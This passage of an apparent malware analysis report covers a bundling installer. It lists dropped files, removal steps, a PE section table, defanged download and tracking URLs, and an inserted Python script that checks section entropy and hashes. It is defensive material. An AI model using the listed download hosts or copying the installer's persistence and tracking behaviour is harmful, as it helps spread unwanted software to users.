%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (165 bytes)
%Program Files%\Rising\RAV\XMLS\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (634 bytes)
%Program Files%\Rising\RAV\XMLS\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (248 bytes)
%Program Files%\Rising\RAV\bacore.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Program Files%\Rising\RAV\XMLS\RAVMON.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RAV\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Program Files%\Rising\RAV\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (1153 bytes)
%Program Files%\Rising\RAV\XMLS\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RAV\XMLS\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3926 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RAV\msvcp90.dll (3361 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Rising Software Deployment System\.lnk (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RAV\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\c[1].aspx (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ShortCut\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RAV\mondef.dll (3361 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (7805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsmon.db1 (43 bytes)
%Program Files%\Rising\RAV\cnt09.dll (1281 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (459 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RAV\localopt.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (1803 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RAV\cloudnotifier.dll (1425 bytes)
%Program Files%\Rising\RAV\traywnd.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (6045 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Program Files%\Rising\RAV\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (5724 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RAV\rsxml3a.dll (673 bytes)
%System%\drivers\rsndisp.sys (10 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RAV\rstasku.xml (4 bytes)
%Program Files%\Rising\RAV\XMLS\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\RAV.ini (599 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Program Files%\Rising\RAV\syslay.dll (26 bytes)
%Program Files%\Rising\RAV\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%System%\drivers\kguard.sys (601 bytes)
%Program Files%\Rising\RAV\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (1039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RAV\cloudwork.dll (7726 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (1384 bytes)
%Program Files%\Rising\RAV\defmon.dll (3361 bytes)
%Program Files%\Rising\RAV\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
C:\rising.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\uprsmon.dat (45 bytes)
%Program Files%\Rising\RAV\cloudnet.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Program Files%\Rising\RAV\XMLS\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (57324 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAV936.xml (515 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\pngdll.dll (1425 bytes)
%Program Files%\Rising\RAV\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RAV\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RAV\XMLS\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RAV\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RAV\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (168 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RAV\XMLS\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1403380.exe.log (314853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (2065 bytes)
%Program Files%\Rising\RAV\XMLS\RAVXP.xml (404 bytes)
%Program Files%\Rising\RAV\XMLS\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (6605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Program Files%\Rising\RAV\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Program Files%\Rising\RAV\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (608 bytes)
%Program Files%\Rising\RAV\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (1000 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%System%\drivers\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (1202 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\xID.dll (3 bytes)
C:\setup_a1474.exe (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\3.dll (18791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\desktop.ini (67 bytes)
C:\SinaInstall_567015.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\desktop.ini (67 bytes)
C:\MM-liao8327.exe (6359 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
%Program Files%\Rising\RAV\logfiles\ravmond.exe.cloudwork.log (6073 bytes)
%Program Files%\Rising\RAV\logfiles\ravmond.exe.log (149 bytes)
%Program Files%\Rising\RAV\browserruncount.dat (944 bytes)
%Program Files%\Rising\RAV\prvcloudcfg.ini (26 bytes)
%Program Files%\Rising\RAV\ravmond.exe_status.ini (80 bytes)
%Program Files%\Rising\RAV\CCenter.db-journal (18630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SinaInstall_567015.exe (15506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_01.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\core[1].php (764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_02.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\installedSoftInfo.ini (1804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\skinconfig.ini (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_17.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\pop_bg.png (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.0551fs[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_03.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller_prompt.ini (375 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9.tmp (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_8.tmp (2705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\cancel_btn.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\LZMA.dll (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\z_stat[1].php (1097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_7.tmp (201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller.ini (939 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\unrar.dll (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_02.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\install_begin[1].htm (329 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\img[1].png (135828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\img.rar (82437 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_kprd7_93.xml (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\go.png (196 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_5.tmp_0 (631 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23096 | 23552 | 4.43854 | 092e164daa50385128d3c5b319373035 |
.rdata | 28672 | 4496 | 4608 | 3.59023 | 4e7f519777030dd2f0ea0d2092babed3 |
.data | 36864 | 110424 | 1024 | 3.20088 | f6d93c048bf148a2daee8a6b0505e38b |
.ndata | 147456 | 57344 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 204800 | 79072 | 79360 | 5.29506 | ee9b0c553d201ddeb1acb5af9774b9c6 |
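The Entropy and Section MD5 columns above are computed from each section's raw bytes, and two rows deserve a closer look: .ndata has a raw size of 0 and the MD5 d41d8cd98f00b204e9800998ecf8427e, which is the MD5 of zero bytes (the section exists only in memory, as the uninitialized-data section of an NSIS stub does), and .data has a virtual size roughly a hundred times its raw size, so most of it is zero-filled at load time. The Python below is an added example, not part of the Lavasoft report: it recomputes both columns for constructed byte strings and applies rule-of-thumb flags to the rows of the table. The 7.0 bits-per-byte "packed" threshold, the 4x virtual-to-raw ratio and the list of common section names are my assumptions.

```python
import hashlib
import math
from collections import Counter

# MD5 of zero bytes. A section with raw size 0 contributes no bytes to the hash,
# so its "Section MD5" column is exactly this value (as for .ndata in the table).
EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # d41d8cd98f00b204e9800998ecf8427e


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_fingerprint(raw: bytes):
    """The two computed columns of the table (entropy, MD5) for one section's raw bytes."""
    return round(shannon_entropy(raw), 5), hashlib.md5(raw).hexdigest()


# Names a linker or common installer stub emits; .ndata is the NSIS stub's BSS-style section.
COMMON_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                ".edata", ".tls", ".bss", ".ndata"}


def classify_section(name, vsize, rawsize, entropy, md5, packed_threshold=7.0):
    """Flags for one table row. Thresholds are assumed rules of thumb, not the report's."""
    flags = []
    if rawsize == 0:
        flags.append("uninitialized (no bytes on disk)")
        if md5 != EMPTY_MD5:
            flags.append("inconsistent: raw size 0 but MD5 is not the empty-input MD5")
    elif vsize > 4 * rawsize:
        flags.append("virtual size >> raw size (zero-filled at load)")
    if entropy >= packed_threshold:
        flags.append("high entropy (likely packed/encrypted)")
    if name not in COMMON_NAMES:
        flags.append("non-standard section name")
    return flags


# Rows copied from the PE Sections table: (name, vaddr, vsize, rawsize, entropy, md5)
SECTIONS = [
    (".text", 4096, 23096, 23552, 4.43854, "092e164daa50385128d3c5b319373035"),
    (".rdata", 28672, 4496, 4608, 3.59023, "4e7f519777030dd2f0ea0d2092babed3"),
    (".data", 36864, 110424, 1024, 3.20088, "f6d93c048bf148a2daee8a6b0505e38b"),
    (".ndata", 147456, 57344, 0, 0.0, "d41d8cd98f00b204e9800998ecf8427e"),
    (".rsrc", 204800, 79072, 79360, 5.29506, "ee9b0c553d201ddeb1acb5af9774b9c6"),
]


def review_table(rows=SECTIONS) -> dict:
    """Map section name -> flags, omitting rows with nothing to report."""
    result = {}
    for name, _vaddr, vsize, rawsize, entropy, md5 in rows:
        flags = classify_section(name, vsize, rawsize, entropy, md5)
        if flags:
            result[name] = flags
    return result


if __name__ == "__main__":
    # Constructed inputs: all-zero bytes (entropy 0) and a uniform byte distribution (entropy 8)
    print("zeros   ", section_fingerprint(b"\x00" * 1024))
    print("uniform ", section_fingerprint(bytes(range(256)) * 4))
    print("empty   ", section_fingerprint(b""))
    for name, flags in review_table().items():
        print(name, "->", "; ".join(flags))
```

The table's .ndata row passes the consistency check (raw size 0 and the empty-input MD5 agree); a row with raw size 0 and any other hash would mean the tool hashed something other than the on-disk bytes.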
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://1st.dl.glb0.lxdns.com/dl/qdtg/install1403380.exe | |
hxxp://bgp8.yandui.com/xlxc/img/567015/img.png | |
hxxp://bgp8.yandui.com/Public/config/xlxc/install_begin.html?567015 | |
hxxp://bgp8.yandui.com/Public/conf/open/1/35_1_0_1_1/10.jpg | |
hxxp://bgp8.yandui.com/Public/conf/open/1/35_1_0_1_1/11.jpg | |
hxxp://bgp8.yandui.com/Public/conf/c-lock/2/35_1_0_1_1/567015.xml | |
hxxp://bgp8.yandui.com/Public/conf/cpa/2/35_1_0_1_1/567015.xml | |
hxxp://bgp8.yandui.com/Public/conf/cybercafe_check/index.xml | |
hxxp://bgp8.yandui.com/Public/conf/resource_donum.xml | |
hxxp://bgp8.yandui.com/Public/conf/homepage/2/35_1_0_1_1/567015.xml | |
hxxp://bgp8.yandui.com/Public/conf/icon/2/35_1_0_1_1/567015.xml | |
hxxp://all.cnzz.com.danuoyi.tbcache.com/z_stat.php?id=1255160857 | |
hxxp://oz.cnzz.com/stat.htm?id=1255160857&r=&lg=en-us&ntime=none&cnzz_eid=336905316-1436411426-&showp=1916x902&t=&h=1&rnd=1494402114 | 198.11.132.200 |
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1255160857&t=z | |
hxxp://z.rising.com.cn/urg.asp?v=ravbase&t=rav&a= | |
hxxp://z.rising.com.cn/register/minicenter/e/c.aspx | |
